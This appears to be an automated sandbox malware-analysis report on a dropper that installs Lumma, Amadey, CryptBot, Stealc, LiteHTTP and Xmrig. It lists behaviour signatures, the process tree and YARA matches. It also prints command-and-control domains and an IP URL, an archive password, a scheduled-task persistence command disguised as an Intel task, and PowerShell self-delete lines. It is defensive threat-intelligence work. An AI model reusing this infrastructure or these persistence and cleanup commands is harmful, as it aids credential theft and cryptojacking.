Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1576440
MD5:	79a76f34927416f5a65bf946e45037ae
SHA1:	db1a4a8db5bb53533b83b6e1bcd1be237a2ca21d
SHA256:	d64545e2fbcc8ac277cc61f993baaeb5da2b7c41df95f0341078c7c4e4ddd332
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Cryptbot

Yara detected LiteHTTP Bot

Yara detected LummaC Stealer

Yara detected Stealc

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Creates multiple autostart registry keys

Drops password protected ZIP file

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found strings related to Crypto-Mining

Hides threads from debuggers

Injects code into the Windows Explorer (explorer.exe)

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Sigma detected: New RUN Key Pointing to Suspicious Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file overlay found

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 79A76F34927416F5A65BF946E45037AE)

skotes.exe (PID: 6108 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 79A76F34927416F5A65BF946E45037AE)

skotes.exe (PID: 2704 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 79A76F34927416F5A65BF946E45037AE)

e66237da20.exe (PID: 1524 cmdline: "C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe" MD5: FD17D712C627B434E99749CFC82C7D51)

b3712f1a7c.exe (PID: 2796 cmdline: "C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 3808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 384 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)

7z.exe (PID: 1888 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 4996 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6120 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 1084 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 5740 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 3848 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 4112 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 3664 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

attrib.exe (PID: 6588 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

in.exe (PID: 4824 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)

attrib.exe (PID: 6092 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 2468 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2220 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6180 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 6616 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

53f7160658.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe" MD5: D37DAB4C59E707F632BB0B91EAA87FF9)

53fe16f582.exe (PID: 7092 cmdline: "C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe" MD5: 119E98D812D67FAAD4C9243ECE8FFB66)

a98b6b83c7.exe (PID: 6528 cmdline: "C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe" MD5: 888B13E065AFA64105EADCA248F496AE)

Intel_PTT_EK_Recertification.exe (PID: 3688 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)

explorer.exe (PID: 3732 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

powershell.exe (PID: 6112 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 2828 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

Intel_PTT_EK_Recertification.exe (PID: 4740 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)

explorer.exe (PID: 1244 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

powershell.exe (PID: 6576 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "aspecteirs.lat", "sweepyribs.lat", "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000002.2990751286.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000027.00000002.3341620499.0000000001375000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000002.3474117746.0000000000692000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
00000027.00000002.3341620499.000000000135B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000000.00000003.2092252463.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000002.2991389570.000000014040B000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000027.00000002.3341620499.0000000001337000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000003.3017322242.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
00000002.00000003.2123575459.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000002.2990751286.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001E.00000002.2991295379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000003.2675898098.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000027.00000002.3343064138.000000014040B000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000027.00000002.3342923144.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 3688	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 3732	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: 53f7160658.exe PID: 6972	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 4740	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 1244	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
35.2.53f7160658.exe.690000.0.unpack	JoeSecurity_LiteHTTPBot	Yara detected LiteHTTP Bot	Joe Security
35.2.53f7160658.exe.690000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
35.2.53f7160658.exe.690000.0.unpack	MALWARE_Win_CoreBot	Detects CoreBot	ditekSHen	0x8862:$v1_1: newtask 0x7243:$v1_6: payload 0x7446:$v1_7: DownloadFile 0x7453:$v1_8: RemoveFile 0x8814:$cnc1: &os= 0x881e:$cnc2: &pv= 0x8828:$cnc3: &ip= 0x8832:$cnc4: &cn= 0x883c:$cnc5: &lr= 0x8846:$cnc6: &ct= 0x8850:$cnc7: &bv= 0x8872:$cnc8: &op= 0x8880:$cnc9: &td= 0x8894:$cnc10: &uni=
5.2.skotes.exe.730000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.9d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.730000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
39.2.explorer.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.explorer.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
39.2.explorer.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x324cc8:$x1: donate.ssl.xmrig.com
38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x325978:$s1: %s/%s (Windows NT %lu.%lu 0x329580:$s3: \\.\WinRing0_ 0x2e3130:$s4: pool_wallet 0x2dd978:$s5: cryptonight 0x2dd988:$s5: cryptonight 0x2dd998:$s5: cryptonight 0x2dd9a8:$s5: cryptonight 0x2dd9c0:$s5: cryptonight 0x2dd9d0:$s5: cryptonight 0x2dd9e0:$s5: cryptonight 0x2dd9f8:$s5: cryptonight 0x2dda08:$s5: cryptonight 0x2dda20:$s5: cryptonight 0x2dda38:$s5: cryptonight 0x2dda48:$s5: cryptonight 0x2dda58:$s5: cryptonight 0x2dda68:$s5: cryptonight 0x2dda80:$s5: cryptonight 0x2dda98:$s5: cryptonight 0x2ddaa8:$s5: cryptonight 0x2ddab8:$s5: cryptonight
29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x324cc8:$x1: donate.ssl.xmrig.com
29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x325978:$s1: %s/%s (Windows NT %lu.%lu 0x329580:$s3: \\.\WinRing0_ 0x2e3130:$s4: pool_wallet 0x2dd978:$s5: cryptonight 0x2dd988:$s5: cryptonight 0x2dd998:$s5: cryptonight 0x2dd9a8:$s5: cryptonight 0x2dd9c0:$s5: cryptonight 0x2dd9d0:$s5: cryptonight 0x2dd9e0:$s5: cryptonight 0x2dd9f8:$s5: cryptonight 0x2dda08:$s5: cryptonight 0x2dda20:$s5: cryptonight 0x2dda38:$s5: cryptonight 0x2dda48:$s5: cryptonight 0x2dda58:$s5: cryptonight 0x2dda68:$s5: cryptonight 0x2dda80:$s5: cryptonight 0x2dda98:$s5: cryptonight 0x2ddaa8:$s5: cryptonight 0x2ddab8:$s5: cryptonight
30.2.explorer.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
30.2.explorer.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
30.2.explorer.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x325ac8:$x1: donate.ssl.xmrig.com
38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x326778:$s1: %s/%s (Windows NT %lu.%lu 0x32a380:$s3: \\.\WinRing0_ 0x2e3f30:$s4: pool_wallet 0x2de778:$s5: cryptonight 0x2de788:$s5: cryptonight 0x2de798:$s5: cryptonight 0x2de7a8:$s5: cryptonight 0x2de7c0:$s5: cryptonight 0x2de7d0:$s5: cryptonight 0x2de7e0:$s5: cryptonight 0x2de7f8:$s5: cryptonight 0x2de808:$s5: cryptonight 0x2de820:$s5: cryptonight 0x2de838:$s5: cryptonight 0x2de848:$s5: cryptonight 0x2de858:$s5: cryptonight 0x2de868:$s5: cryptonight 0x2de880:$s5: cryptonight 0x2de898:$s5: cryptonight 0x2de8a8:$s5: cryptonight 0x2de8b8:$s5: cryptonight
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

